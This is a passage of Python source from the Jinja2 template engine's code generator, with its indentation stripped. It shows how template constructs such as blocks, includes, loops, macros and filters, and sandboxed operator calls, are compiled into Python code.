self._last_identifier = 0
# the current indentation
self._indentation = 0
# -- Various compilation helpers
def fail(self, msg, lineno):
"""Fail with a :exc:`TemplateAssertionError`."""
raise TemplateAssertionError(msg, lineno, self.name, self.filename)
def temporary_identifier(self):
"""Get a new unique identifier."""
self._last_identifier += 1
return 't_%d' % self._last_identifier
def buffer(self, frame):
"""Enable buffering for the frame from that point onwards."""
frame.buffer = self.temporary_identifier()
self.writeline('%s = []' % frame.buffer)
def return_buffer_contents(self, frame):
"""Return the buffer contents of the frame."""
if frame.eval_ctx.volatile:
self.writeline('if context.eval_ctx.autoescape:')
self.indent()
self.writeline('return Markup(concat(%s))' % frame.buffer)
self.outdent()
self.writeline('else:')
self.indent()
self.writeline('return concat(%s)' % frame.buffer)
self.outdent()
elif frame.eval_ctx.autoescape:
self.writeline('return Markup(concat(%s))' % frame.buffer)
else:
self.writeline('return concat(%s)' % frame.buffer)
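# Illustrative generated code (assuming a buffered frame whose buffer
# is t_1 and a non-volatile, autoescaping eval context):
# return Markup(concat(t_1))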
def indent(self):
"""Indent by one."""
self._indentation += 1
def outdent(self, step=1):
"""Outdent by step."""
self._indentation -= step
def start_write(self, frame, node=None):
"""Yield or write into the frame buffer."""
if frame.buffer is None:
self.writeline('yield ', node)
else:
self.writeline('%s.append(' % frame.buffer, node)
def end_write(self, frame):
"""End the writing process started by `start_write`."""
if frame.buffer is not None:
self.write(')')
def simple_write(self, s, frame, node=None):
"""Simple shortcut for start_write + write + end_write."""
self.start_write(frame, node)
self.write(s)
self.end_write(frame)
def blockvisit(self, nodes, frame):
"""Visit a list of nodes as block in a frame. If the current frame
is no buffer a dummy ``if 0: yield None`` is written automatically
unless the force_generator parameter is set to False.
"""
if frame.buffer is None:
self.writeline('if 0: yield None')
else:
self.writeline('pass')
try:
for node in nodes:
self.visit(node, frame)
except CompilerExit:
pass
def write(self, x):
"""Write a string into the output stream."""
if self._new_lines:
if not self._first_write:
self.stream.write('\n' * self._new_lines)
self.code_lineno += self._new_lines
if self._write_debug_info is not None:
self.debug_info.append((self._write_debug_info,
self.code_lineno))
self._write_debug_info = None
self._first_write = False
self.stream.write(' ' * self._indentation)
self._new_lines = 0
self.stream.write(x)
def writeline(self, x, node=None, extra=0):
"""Combination of newline and write."""
self.newline(node, extra)
self.write(x)
def newline(self, node=None, extra=0):
"""Add one or more newlines before the next write."""
self._new_lines = max(self._new_lines, 1 + extra)
if node is not None and node.lineno != self._last_line:
self._write_debug_info = node.lineno
self._last_line = node.lineno
def signature(self, node, frame, extra_kwargs=None):
"""Writes a function call to the stream for the current node.
A leading comma is added automatically. The extra keyword
arguments may not include Python keywords, otherwise a syntax
error could occur. The extra keyword arguments should be given
as a python dict.
"""
# if any of the given keyword arguments is a python keyword
# we have to make sure that no invalid call is created.
kwarg_workaround = False
for kwarg in chain((x.key for x in node.kwargs), extra_kwargs or ()):
if is_python_keyword(kwarg):
kwarg_workaround = True
break
for arg in node.args:
self.write(', ')
self.visit(arg, frame)
if not kwarg_workaround:
for kwarg in node.kwargs:
self.write(', ')
self.visit(kwarg, frame)
if extra_kwargs is not None:
for key, value in extra_kwargs.iteritems():
self.write(', %s=%s' % (key, value))
if node.dyn_args:
self.write(', *')
self.visit(node.dyn_args, frame)
if kwarg_workaround:
if node.dyn_kwargs is not None:
self.write(', **dict({')
else:
self.write(', **{')
for kwarg in node.kwargs:
self.write('%r: ' % kwarg.key)
self.visit(kwarg.value, frame)
self.write(', ')
if extra_kwargs is not None:
for key, value in extra_kwargs.iteritems():
self.write('%r: %s, ' % (key, value))
if node.dyn_kwargs is not None:
self.write('}, **')
self.visit(node.dyn_kwargs, frame)
self.write(')')
else:
self.write('}')
elif node.dyn_kwargs is not None:
self.write(', **')
self.visit(node.dyn_kwargs, frame)
def pull_locals(self, frame):
"""Pull all the references identifiers into the local scope."""
for name in frame.identifiers.undeclared:
self.writeline('l_%s = context.resolve(%r)' % (name, name))
def pull_dependencies(self, nodes):
"""Pull all the dependencies."""
visitor = DependencyFinderVisitor()
for node in nodes:
visitor.visit(node)
for dependency in 'filters', 'tests':
mapping = getattr(self, dependency)
for name in getattr(visitor, dependency):
if name not in mapping:
mapping[name] = self.temporary_identifier()
self.writeline('%s = environment.%s[%r]' %
(mapping[name], dependency, name))
def unoptimize_scope(self, frame):
"""Disable Python optimizations for the frame."""
# XXX: this is not that nice but it has no real overhead. It
# mainly works because python finds the locals before dead code
# is removed. If that breaks we have to add a dummy function
# that just accepts the arguments and does nothing.
if frame.identifiers.declared:
self.writeline('%sdummy(%s)' % (
unoptimize_before_dead_code and 'if 0: ' or '',
', '.join('l_' + name for name in frame.identifiers.declared)
))
def push_scope(self, frame, extra_vars=()):
"""This function returns all the shadowed variables in a dict
in the form name: alias and will write the required assignments
into the current scope. No indentation takes place.
This also predefines locally declared variables from the loop
body because under some circumstances it may be the case that
`extra_vars` is passed to `Frame.find_shadowed`.
"""
aliases = {}
for name in frame.find_shadowed(extra_vars):
aliases[name] = ident = self.temporary_identifier()
self.writeline('%s = l_%s' % (ident, name))
to_declare = set()
for name in frame.identifiers.declared_locally:
if name not in aliases:
to_declare.add('l_' + name)
if to_declare:
self.writeline(' = '.join(to_declare) + ' = missing')
return aliases
def pop_scope(self, aliases, frame):
"""Restore all aliases and delete unused variables."""
for name, alias in aliases.iteritems():
self.writeline('l_%s = %s' % (name, alias))
to_delete = set()
for name in frame.identifiers.declared_locally:
if name not in aliases:
to_delete.add('l_' + name)
if to_delete:
# we cannot use the del statement here because enclosed
# scopes can trigger a SyntaxError:
# a = 42; b = lambda: a; del a
self.writeline(' = '.join(to_delete) + ' = missing')
def function_scoping(self, node, frame, children=None,
find_special=True):
"""In Jinja a few statements require the help of anonymous
functions. Those are currently macros and call blocks and in
the future also recursive loops. As there is currently a
technical limitation that doesn't allow reading and writing a
variable in a scope where the initial value is coming from an
outer scope, this function fails with a common
error message. Additionally the frame passed is modified so
that the arguments are collected and callers are looked up.
This will return the modified frame.
"""
# we have to iterate twice over it, make sure that works
if children is None:
children = node.iter_child_nodes()
children = list(children)
func_frame = frame.inner()
func_frame.inspect(children)
# variables that are undeclared (accessed before declaration) and
# declared locally *and* part of an outside scope raise a template
# assertion error. Reason: we can't generate reasonable code from
# it without aliasing all the variables.
# this could be fixed in Python 3 where we have the nonlocal
# keyword or if we switch to bytecode generation
overridden_closure_vars = (
func_frame.identifiers.undeclared &
func_frame.identifiers.declared &
(func_frame.identifiers.declared_locally |
func_frame.identifiers.declared_parameter)
)
if overridden_closure_vars:
self.fail('It\'s not possible to set and access variables '
'derived from an outer scope! (affects: %s)' %
', '.join(sorted(overridden_closure_vars)), node.lineno)
# remove variables from a closure from the frame's undeclared
# identifiers.
func_frame.identifiers.undeclared -= (
func_frame.identifiers.undeclared &
func_frame.identifiers.declared
)
# no special variables for this scope, abort early
if not find_special:
return func_frame
func_frame.accesses_kwargs = False
func_frame.accesses_varargs = False
func_frame.accesses_caller = False
func_frame.arguments = args = ['l_' + x.name for x in node.args]
undeclared = find_undeclared(children, ('caller', 'kwargs', 'varargs'))
if 'caller' in undeclared:
func_frame.accesses_caller = True
func_frame.identifiers.add_special('caller')
args.append('l_caller')
if 'kwargs' in undeclared:
func_frame.accesses_kwargs = True
func_frame.identifiers.add_special('kwargs')
args.append('l_kwargs')
if 'varargs' in undeclared:
func_frame.accesses_varargs = True
func_frame.identifiers.add_special('varargs')
args.append('l_varargs')
return func_frame
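# Illustrative note: the special names above are only materialized when
# the body actually uses them. For example, a macro body containing
# {{ kwargs }} gets an extra 'l_kwargs' argument appended here, while a
# macro that never mentions caller/kwargs/varargs gets none of the three.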
def macro_body(self, node, frame, children=None):
"""Dump the function def of a macro or call block."""
frame = self.function_scoping(node, frame, children)
# macros are delayed, they never require output checks
frame.require_output_check = False
args = frame.arguments
# XXX: this is an ugly fix for the loop nesting bug
# (tests.test_old_bugs.test_loop_call_bug). This works around
# an identifier nesting problem we have in general. It's just more
# likely to happen in loops which is why we work around it. The
# real solution would be "nonlocal" all the identifiers that are
# leaking into a new python frame and might be used both unassigned
# and assigned.
if 'loop' in frame.identifiers.declared:
args = args + ['l_loop=l_loop']
self.writeline('def macro(%s):' % ', '.join(args), node)
self.indent()
self.buffer(frame)
self.pull_locals(frame)
self.blockvisit(node.body, frame)
self.return_buffer_contents(frame)
self.outdent()
return frame
def macro_def(self, node, frame):
"""Dump the macro definition for the def created by macro_body."""
arg_tuple = ', '.join(repr(x.name) for x in node.args)
name = getattr(node, 'name', None)
if len(node.args) == 1:
arg_tuple += ','
self.write('Macro(environment, macro, %r, (%s), (' %
(name, arg_tuple))
for arg in node.defaults:
self.visit(arg, frame)
self.write(', ')
self.write('), %r, %r, %r)' % (
bool(frame.accesses_kwargs),
bool(frame.accesses_varargs),
bool(frame.accesses_caller)
))
def position(self, node):
"""Return a human readable position for the node."""
rv = 'line %d' % node.lineno
if self.name is not None:
rv += ' in ' + repr(self.name)
return rv
# -- Statement Visitors
def visit_Template(self, node, frame=None):
assert frame is None, 'no root frame allowed'
eval_ctx = EvalContext(self.environment, self.name)
from jinja2.runtime import __all__ as exported
self.writeline('from __future__ import division')
self.writeline('from jinja2.runtime import ' + ', '.join(exported))
if not unoptimize_before_dead_code:
self.writeline('dummy = lambda *x: None')
# if we want a deferred initialization we cannot move the
# environment into a local name
envenv = not self.defer_init and ', environment=environment' or ''
# do we have an extends tag at all? If not, we can save some
# overhead by just not processing any inheritance code.
have_extends = node.find(nodes.Extends) is not None
# find all blocks
for block in node.find_all(nodes.Block):
if block.name in self.blocks:
self.fail('block %r defined twice' % block.name, block.lineno)
self.blocks[block.name] = block
# find all imports and import them
for import_ in node.find_all(nodes.ImportedName):
if import_.importname not in self.import_aliases:
imp = import_.importname
self.import_aliases[imp] = alias = self.temporary_identifier()
if '.' in imp:
module, obj = imp.rsplit('.', 1)
self.writeline('from %s import %s as %s' %
(module, obj, alias))
else:
self.writeline('import %s as %s' % (imp, alias))
# add the load name
self.writeline('name = %r' % self.name)
# generate the root render function.
self.writeline('def root(context%s):' % envenv, extra=1)
# process the root
frame = Frame(eval_ctx)
frame.inspect(node.body)
frame.toplevel = frame.rootlevel = True
frame.require_output_check = have_extends and not self.has_known_extends
self.indent()
if have_extends:
self.writeline('parent_template = None')
if 'self' in find_undeclared(node.body, ('self',)):
frame.identifiers.add_special('self')
self.writeline('l_self = TemplateReference(context)')
self.pull_locals(frame)
self.pull_dependencies(node.body)
self.blockvisit(node.body, frame)
self.outdent()
# make sure that the parent root is called.
if have_extends:
if not self.has_known_extends:
self.indent()
self.writeline('if parent_template is not None:')
self.indent()
self.writeline('for event in parent_template.'
'root_render_func(context):')
self.indent()
self.writeline('yield event')
self.outdent(2 + (not self.has_known_extends))
# at this point we now have the blocks collected and can visit them too.
for name, block in self.blocks.iteritems():
block_frame = Frame(eval_ctx)
block_frame.inspect(block.body)
block_frame.block = name
self.writeline('def block_%s(context%s):' % (name, envenv),
block, 1)
self.indent()
undeclared = find_undeclared(block.body, ('self', 'super'))
if 'self' in undeclared:
block_frame.identifiers.add_special('self')
self.writeline('l_self = TemplateReference(context)')
if 'super' in undeclared:
block_frame.identifiers.add_special('super')
self.writeline('l_super = context.super(%r, '
'block_%s)' % (name, name))
self.pull_locals(block_frame)
self.pull_dependencies(block.body)
self.blockvisit(block.body, block_frame)
self.outdent()
self.writeline('blocks = {%s}' % ', '.join('%r: block_%s' % (x, x)
for x in self.blocks),
extra=1)
# add a function that returns the debug info
self.writeline('debug_info = %r' % '&'.join('%s=%s' % x for x
in self.debug_info))
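# Illustrative shape of the module source this method emits (assumed,
# abbreviated):
# from __future__ import division
# from jinja2.runtime import ...
# name = 'example.html'
# def root(context):
# ...
# blocks = {'body': block_body}
# debug_info = '1=9&2=10'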
def visit_Block(self, node, frame):
"""Call a block and register it for the template."""
level = 1
if frame.toplevel:
# if we know that we are a child template, there is no need to
# check if we are one
if self.has_known_extends:
return
if self.extends_so_far > 0:
self.writeline('if parent_template is None:')
self.indent()
level += 1
context = node.scoped and 'context.derived(locals())' or 'context'
self.writeline('for event in context.blocks[%r][0](%s):' % (
node.name, context), node)
self.indent()
self.simple_write('event', frame)
self.outdent(level)
def visit_Extends(self, node, frame):
"""Calls the extender."""
if not frame.toplevel:
self.fail('cannot use extend from a non top-level scope',
node.lineno)
# if the number of extends statements in general is zero so
# far, we don't have to add a check if something extended
# the template before this one.
if self.extends_so_far > 0:
# if we have a known extends we just add a template runtime
# error into the generated code. We could catch that at compile
# time too, but it's better not to confuse users by throwing the
# same error at different times just "because we can".
if not self.has_known_extends:
self.writeline('if parent_template is not None:')
self.indent()
self.writeline('raise TemplateRuntimeError(%r)' %
'extended multiple times')
self.outdent()
# if we have a known extends already we don't need that code here
# as we know that the template execution will end here.
if self.has_known_extends:
raise CompilerExit()
self.writeline('parent_template = environment.get_template(', node)
self.visit(node.template, frame)
self.write(', %r)' % self.name)
self.writeline('for name, parent_block in parent_template.'
'blocks.%s():' % dict_item_iter)
self.indent()
self.writeline('context.blocks.setdefault(name, []).'
'append(parent_block)')
self.outdent()
# if this extends statement was in the root level we can take
# advantage of that information and simplify the generated code
# in the top level from this point onwards
if frame.rootlevel:
self.has_known_extends = True
# and now we have one more
self.extends_so_far += 1
def visit_Include(self, node, frame):
"""Handles includes."""
if node.with_context:
self.unoptimize_scope(frame)
if node.ignore_missing:
self.writeline('try:')
self.indent()
func_name = 'get_or_select_template'
if isinstance(node.template, nodes.Const):
if isinstance(node.template.value, basestring):
func_name = 'get_template'
elif isinstance(node.template.value, (tuple, list)):
func_name = 'select_template'
elif isinstance(node.template, (nodes.Tuple, nodes.List)):
func_name = 'select_template'
self.writeline('template = environment.%s(' % func_name, node)
self.visit(node.template, frame)
self.write(', %r)' % self.name)
if node.ignore_missing:
self.outdent()
self.writeline('except TemplateNotFound:')
self.indent()
self.writeline('pass')
self.outdent()
self.writeline('else:')
self.indent()
if node.with_context:
self.writeline('for event in template.root_render_func('
'template.new_context(context.parent, True, '
'locals())):')
else:
self.writeline('for event in template.module._body_stream:')
self.indent()
self.simple_write('event', frame)
self.outdent()
if node.ignore_missing:
self.outdent()
def visit_Import(self, node, frame):
"""Visit regular imports."""
if node.with_context:
self.unoptimize_scope(frame)
self.writeline('l_%s = ' % node.target, node)
if frame.toplevel:
self.write('context.vars[%r] = ' % node.target)
self.write('environment.get_template(')
self.visit(node.template, frame)
self.write(', %r).' % self.name)
if node.with_context:
self.write('make_module(context.parent, True, locals())')
else:
self.write('module')
if frame.toplevel and not node.target.startswith('_'):
self.writeline('context.exported_vars.discard(%r)' % node.target)
frame.assigned_names.add(node.target)
def visit_FromImport(self, node, frame):
"""Visit named imports."""
self.newline(node)
self.write('included_template = environment.get_template(')
self.visit(node.template, frame)
self.write(', %r).' % self.name)
if node.with_context:
self.write('make_module(context.parent, True)')
else:
self.write('module')
var_names = []
discarded_names = []
for name in node.names:
if isinstance(name, tuple):
name, alias = name
else:
alias = name
self.writeline('l_%s = getattr(included_template, '
'%r, missing)' % (alias, name))
self.writeline('if l_%s is missing:' % alias)
self.indent()
self.writeline('l_%s = environment.undefined(%r %% '
'included_template.__name__, '
'name=%r)' %
(alias, 'the template %%r (imported on %s) does '
'not export the requested name %s' % (
self.position(node),
repr(name)
), name))
self.outdent()
if frame.toplevel:
var_names.append(alias)
if not alias.startswith('_'):
discarded_names.append(alias)
frame.assigned_names.add(alias)
if var_names:
if len(var_names) == 1:
name = var_names[0]
self.writeline('context.vars[%r] = l_%s' % (name, name))
else:
self.writeline('context.vars.update({%s})' % ', '.join(
'%r: l_%s' % (name, name) for name in var_names
))
if discarded_names:
if len(discarded_names) == 1:
self.writeline('context.exported_vars.discard(%r)' %
discarded_names[0])
else:
self.writeline('context.exported_vars.difference_'
'update((%s))' % ', '.join(map(repr, discarded_names)))
def visit_For(self, node, frame):
# when calculating the nodes for the inner frame we have to exclude
# the iterator contents from it
children = node.iter_child_nodes(exclude=('iter',))
if node.recursive:
loop_frame = self.function_scoping(node, frame, children,
find_special=False)
else:
loop_frame = frame.inner()
loop_frame.inspect(children)
# try to figure out if we have an extended loop. An extended loop
# is necessary if the loop is in recursive mode or if the special loop
# variable is accessed in the body.
extended_loop = node.recursive or 'loop' in \
find_undeclared(node.iter_child_nodes(
only=('body',)), ('loop',))
# if we don't have a recursive loop we have to find the shadowed
# variables at that point. Because loops can be nested but the loop
# variable is a special one we have to enforce aliasing for it.
if not node.recursive:
aliases = self.push_scope(loop_frame, ('loop',))
# otherwise we set up a buffer and add a function def
else:
self.writeline('def loop(reciter, loop_render_func):', node)
self.indent()
self.buffer(loop_frame)
aliases = {}
# make sure the loop variable is a special one and raise a template
# assertion error if a loop tries to write to loop
if extended_loop:
loop_frame.identifiers.add_special('loop')
for name in node.find_all(nodes.Name):
if name.ctx == 'store' and name.name == 'loop':
self.fail('Can\'t assign to special loop variable '
'in for-loop target', name.lineno)
self.pull_locals(loop_frame)
if node.else_:
iteration_indicator = self.temporary_identifier()
self.writeline('%s = 1' % iteration_indicator)
# Create a fake parent loop if the else or test section of a
# loop is accessing the special loop variable and no parent loop
# exists.
if 'loop' not in aliases and 'loop' in find_undeclared(
node.iter_child_nodes(only=('else_', 'test')), ('loop',)):
self.writeline("l_loop = environment.undefined(%r, name='loop')" %
("'loop' is undefined. the filter section of a loop as well "
"as the else block don't have access to the special 'loop'"
" variable of the current loop. Because there is no parent "
"loop it's undefined. Happened in loop on %s" %
self.position(node)))
self.writeline('for ', node)
self.visit(node.target, loop_frame)
self.write(extended_loop and ', l_loop in LoopContext(' or ' in ')
# if we have an extended loop and a node test, we filter in the
# "outer frame".
if extended_loop and node.test is not None:
self.write('(')
self.visit(node.target, loop_frame)
self.write(' for ')
self.visit(node.target, loop_frame)
self.write(' in ')
if node.recursive:
self.write('reciter')
else:
self.visit(node.iter, loop_frame)
self.write(' if (')
test_frame = loop_frame.copy()
self.visit(node.test, test_frame)
self.write('))')
elif node.recursive:
self.write('reciter')
else:
self.visit(node.iter, loop_frame)
if node.recursive:
self.write(', recurse=loop_render_func):')
else:
self.write(extended_loop and '):' or ':')
# tests in non-extended loops become a continue
if not extended_loop and node.test is not None:
self.indent()
self.writeline('if not ')
self.visit(node.test, loop_frame)
self.write(':')
self.indent()
self.writeline('continue')
self.outdent(2)
self.indent()
self.blockvisit(node.body, loop_frame)
if node.else_:
self.writeline('%s = 0' % iteration_indicator)
self.outdent()
if node.else_:
self.writeline('if %s:' % iteration_indicator)
self.indent()
self.blockvisit(node.else_, loop_frame)
self.outdent()
# reset the aliases if there are any.
if not node.recursive:
self.pop_scope(aliases, loop_frame)
# if the node was recursive we have to return the buffer contents
# and start the iteration code
if node.recursive:
self.return_buffer_contents(loop_frame)
self.outdent()
self.start_write(frame, node)
self.write('loop(')
self.visit(node.iter, frame)
self.write(', loop)')
self.end_write(frame)
def visit_If(self, node, frame):
if_frame = frame.soft()
self.writeline('if ', node)
self.visit(node.test, if_frame)
self.write(':')
self.indent()
self.blockvisit(node.body, if_frame)
self.outdent()
if node.else_:
self.writeline('else:')
self.indent()
self.blockvisit(node.else_, if_frame)
self.outdent()
def visit_Macro(self, node, frame):
macro_frame = self.macro_body(node, frame)
self.newline()
if frame.toplevel:
if not node.name.startswith('_'):
self.write('context.exported_vars.add(%r)' % node.name)
self.writeline('context.vars[%r] = ' % node.name)
self.write('l_%s = ' % node.name)
self.macro_def(node, macro_frame)
frame.assigned_names.add(node.name)
def visit_CallBlock(self, node, frame):
children = node.iter_child_nodes(exclude=('call',))
call_frame = self.macro_body(node, frame, children)
self.writeline('caller = ')
self.macro_def(node, call_frame)
self.start_write(frame, node)
self.visit_Call(node.call, call_frame, forward_caller=True)
self.end_write(frame)
def visit_FilterBlock(self, node, frame):
filter_frame = frame.inner()
filter_frame.inspect(node.iter_child_nodes())
aliases = self.push_scope(filter_frame)
self.pull_locals(filter_frame)
self.buffer(filter_frame)
self.blockvisit(node.body, filter_frame)
self.start_write(frame, node)
self.visit_Filter(node.filter, filter_frame)
self.end_write(frame)
self.pop_scope(aliases, filter_frame)
def visit_ExprStmt(self, node, frame):
self.newline(node)
self.visit(node.node, frame)
def visit_Output(self, node, frame):
# if we have a known extends statement, we don't output anything
# if we are in a require_output_check section
if self.has_known_extends and frame.require_output_check:
return
if self.environment.finalize:
finalize = lambda x: unicode(self.environment.finalize(x))
else:
finalize = unicode
# if we are inside a frame that requires output checking, we do so
outdent_later = False
if frame.require_output_check:
self.writeline('if parent_template is None:')
self.indent()
outdent_later = True
# try to evaluate as many chunks as possible into a static
# string at compile time.
body = []
for child in node.nodes:
try:
const = child.as_const(frame.eval_ctx)
except nodes.Impossible:
body.append(child)
continue
# the frame can't be volatile here, because otherwise the
# as_const() function would raise an Impossible exception
# at that point.
try:
if frame.eval_ctx.autoescape:
if hasattr(const, '__html__'):
const = const.__html__()
else:
const = escape(const)
const = finalize(const)
except Exception:
# if something goes wrong here we evaluate the node
# at runtime for easier debugging
body.append(child)
continue
if body and isinstance(body[-1], list):
body[-1].append(const)
else:
body.append([const])
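# Illustrative example (assuming autoescaping off and no custom
# finalize): for "Hello {{ 1 + 1 }}!" every child folds via as_const(),
# so `body` collapses to one list [u'Hello ', u'2', u'!'] and the code
# below emits a single constant yield instead of three runtime writes.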
# if we have less than 3 nodes or a buffer we yield or extend/append
if len(body) < 3 or frame.buffer is not None:
if frame.buffer is not None:
# for one item we append, for more we extend
if len(body) == 1:
self.writeline('%s.append(' % frame.buffer)
else:
self.writeline('%s.extend((' % frame.buffer)
self.indent()
for item in body:
if isinstance(item, list):
val = repr(concat(item))
if frame.buffer is None:
self.writeline('yield ' + val)
else:
self.writeline(val + ', ')
else:
if frame.buffer is None:
self.writeline('yield ', item)
else:
self.newline(item)
close = 1
if frame.eval_ctx.volatile:
self.write('(context.eval_ctx.autoescape and'
' escape or to_string)(')
elif frame.eval_ctx.autoescape:
self.write('escape(')
else:
self.write('to_string(')
if self.environment.finalize is not None:
self.write('environment.finalize(')
close += 1
self.visit(item, frame)
self.write(')' * close)
if frame.buffer is not None:
self.write(', ')
if frame.buffer is not None:
# close the open parentheses
self.outdent()
self.writeline(len(body) == 1 and ')' or '))')
# otherwise we create a format string as this is faster in that case
else:
format = []
arguments = []
for item in body:
if isinstance(item, list):
format.append(concat(item).replace('%', '%%'))
else:
format.append('%s')
arguments.append(item)
self.writeline('yield ')
self.write(repr(concat(format)) + ' % (')
idx = -1
self.indent()
for argument in arguments:
self.newline(argument)
close = 0
if frame.eval_ctx.volatile:
self.write('(context.eval_ctx.autoescape and'
' escape or to_string)(')
close += 1
elif frame.eval_ctx.autoescape:
self.write('escape(')
close += 1
if self.environment.finalize is not None:
self.write('environment.finalize(')
close += 1
self.visit(argument, frame)
self.write(')' * close + ', ')
self.outdent()
self.writeline(')')
if outdent_later:
self.outdent()
def visit_Assign(self, node, frame):
self.newline(node)
# toplevel assignments however go into the local namespace and
# the current template's context. We create a copy of the frame
# here and add a set so that the Name visitor can add the assigned
# names here.
if frame.toplevel:
assignment_frame = frame.copy()
assignment_frame.toplevel_assignments = set()
else:
assignment_frame = frame
self.visit(node.target, assignment_frame)
self.write(' = ')
self.visit(node.node, frame)
# make sure toplevel assignments are added to the context.
if frame.toplevel:
public_names = [x for x in assignment_frame.toplevel_assignments
if not x.startswith('_')]
if len(assignment_frame.toplevel_assignments) == 1:
name = next(iter(assignment_frame.toplevel_assignments))
self.writeline('context.vars[%r] = l_%s' % (name, name))
else:
self.writeline('context.vars.update({')
for idx, name in enumerate(assignment_frame.toplevel_assignments):
if idx:
self.write(', ')
self.write('%r: l_%s' % (name, name))
self.write('})')
if public_names:
if len(public_names) == 1:
self.writeline('context.exported_vars.add(%r)' %
public_names[0])
else:
self.writeline('context.exported_vars.update((%s))' %
', '.join(map(repr, public_names)))
# -- Expression Visitors
def visit_Name(self, node, frame):
if node.ctx == 'store' and frame.toplevel:
frame.toplevel_assignments.add(node.name)
self.write('l_' + node.name)
frame.assigned_names.add(node.name)
def visit_Const(self, node, frame):
val = node.value
if isinstance(val, float):
self.write(str(val))
else:
self.write(repr(val))
def visit_TemplateData(self, node, frame):
try:
self.write(repr(node.as_const(frame.eval_ctx)))
except nodes.Impossible:
self.write('(context.eval_ctx.autoescape and Markup or identity)(%r)'
% node.data)
def visit_Tuple(self, node, frame):
self.write('(')
idx = -1
for idx, item in enumerate(node.items):
if idx:
self.write(', ')
self.visit(item, frame)
self.write(idx == 0 and ',)' or ')')
def visit_List(self, node, frame):
self.write('[')
for idx, item in enumerate(node.items):
if idx:
self.write(', ')
self.visit(item, frame)
self.write(']')
def visit_Dict(self, node, frame):
self.write('{')
for idx, item in enumerate(node.items):
if idx:
self.write(', ')
self.visit(item.key, frame)
self.write(': ')
self.visit(item.value, frame)
self.write('}')
def binop(operator, interceptable=True):
def visitor(self, node, frame):
if self.environment.sandboxed and \
operator in self.environment.intercepted_binops:
self.write('environment.call_binop(context, %r, ' % operator)
self.visit(node.left, frame)
self.write(', ')
self.visit(node.right, frame)
else:
self.write('(')
self.visit(node.left, frame)
self.write(' %s ' % operator)
self.visit(node.right, frame)
self.write(')')
return visitor
def uaop(operator, interceptable=True):
def visitor(self, node, frame):
if self.environment.sandboxed and \
operator in self.environment.intercepted_unops:
self.write('environment.call_unop(context, %r, ' % operator)
self.visit(node.node, frame)
else:
self.write('(' + operator)
self.visit(node.node, frame)
self.write(')')
return visitor
visit_Add = binop('+')
visit_Sub = binop('-')
visit_Mul = binop('*')
visit_Div = binop('/')
visit_FloorDiv = binop('//')
visit_Pow = binop('**')
visit_Mod = binop('%')
visit_And = binop('and', interceptable=False)
visit_Or = binop('or', interceptable=False)
visit_Pos = uaop('+')
visit_Neg = uaop('-')
visit_Not = uaop('not ', interceptable=False)
del binop, uaop
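# Illustrative note: in a sandboxed environment that intercepts '**',
# visit_Pow above emits environment.call_binop(context, '**', left,
# right) instead of a literal (left ** right), so the sandbox can veto
# the operation at runtime.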
def visit_Concat(self, node, frame):
if frame.eval_ctx.volatile:
func_name = '(context.eval_ctx.volatile and' \
' markup_join or unicode_join)'
elif frame.eval_ctx.autoescape:
func_name = 'markup_join'
else:
func_name = 'unicode_join'
self.write('%s((' % func_name)
for arg in node.nodes:
self.visit(arg, frame)
self.write(', ')
self.write('))')
def visit_Compare(self, node, frame):
self.visit(node.expr, frame)
for op in node.ops:
self.visit(op, frame)
def visit_Operand(self, node, frame):
self.write(' %s ' % operators[node.op])
self.visit(node.expr, frame)
def visit_Getattr(self, node, frame):
self.write('environment.getattr(')
self.visit(node.node, frame)
self.write(', %r)' % node.attr)
def visit_Getitem(self, node, frame):
# slices bypass the environment getitem method.
if isinstance(node.arg, nodes.Slice):
self.visit(node.node, frame)
self.write('[')
self.visit(node.arg, frame)
self.write(']')
else:
self.write('environment.getitem(')
self.visit(node.node, frame)
self.write(', ')
self.visit(node.arg, frame)
self.write(')')
def visit_Slice(self, node, frame):
if node.start is not None:
self.visit(node.start, frame)
self.write(':')
if node.stop is not None:
self.visit(node.stop, frame)
if node.step is not None:
self.write(':')
self.visit(node.step, frame)
def visit_Filter(self, node, frame):
self.write(self.filters[node.name] + '(')
func = self.environment.filters.get(node.name)
if func is None:
self.fail('no filter named %r' % node.name, node.lineno)
if getattr(func, 'contextfilter', False):
self.write('context, ')
elif getattr(func, 'evalcontextfilter', False):
self.write('context.eval_ctx, ')
elif getattr(func, 'environmentfilter', False):
self.write('environment, ')
# if the filter node is None we are inside a filter block
# and want to write to the current buffer
if node.node is not None:
self.visit(node.node, frame)
elif frame.eval_ctx.volatile:
self.write('(context.eval_ctx.autoescape and'
' Markup(concat(%s)) or concat(%s))' %
(frame.buffer, frame.buffer))
elif frame.eval_ctx.autoescape:
self.write('Markup(concat(%s))' % frame.buffer)
else:
self.write('concat(%s)' % frame.buffer)
self.signature(node, frame)
self.write(')')
def visit_Test(self, node, frame):
self.write(self.tests[node.name] + '(')
if node.name not in self.environment.tests:
self.fail('no test named %r' % node.name, node.lineno)
self.visit(node.node, frame)
self.signature(node, frame)
self.write(')')
def visit_CondExpr(self, node, frame):
def write_expr2():
if node.expr2 is not None:
return self.visit(node.expr2, frame)
self.write('environment.undefined(%r)' % ('the inline if-'
'expression on %s evaluated to false and '
'no else section was defined.' % self.position(node)))
if not have_condexpr:
self.write('((')
self.visit(node.test, frame)
self.write(') and (')
self.visit(node.expr1, frame)
self.write(',) or (')
write_expr2()
self.write(',))[0]')
else:
self.write('(')
self.visit(node.expr1, frame)
self.write(' if ')
self.visit(node.test, frame)
self.write(' else ')
write_expr2()
self.write(')')
def visit_Call(self, node, frame, forward_caller=False):
if self.environment.sandboxed:
self.write('environment.call(context, ')
else:
self.write('context.call(')
self.visit(node.node, frame)
extra_kwargs = forward_caller and {'caller': 'caller'} or None
self.signature(node, frame, extra_kwargs)
self.write(')')
def visit_Keyword(self, node, frame):
self.write(node.key + '=')
self.visit(node.value, frame)
# -- Unused nodes for extensions
def visit_MarkSafe(self, node, frame):
self.write('Markup(')
self.visit(node.expr, frame)
self.write(')')
def visit_MarkSafeIfAutoescape(self, node, frame):
self.write('(context.eval_ctx.autoescape and Markup or identity)(')
self.visit(node.expr, frame)
self.write(')')
def visit_EnvironmentAttribute(self, node, frame):
self.write('environment.' + node.name)
def visit_ExtensionAttribute(self, node, frame):
self.write('environment.extensions[%r].%s' % (node.identifier, node.name))
def visit_ImportedName(self, node, frame):
self.write(self.import_aliases[node.importname])
def visit_InternalName(self, node, frame):
self.write(node.name)
def visit_ContextReference(self, node, frame):
self.write('context')
def visit_Continue(self, node, frame):
self.writeline('continue', node)
def visit_Break(self, node, frame):
self.writeline('break', node)
def visit_Scope(self, node, frame):
scope_frame = frame.inner()
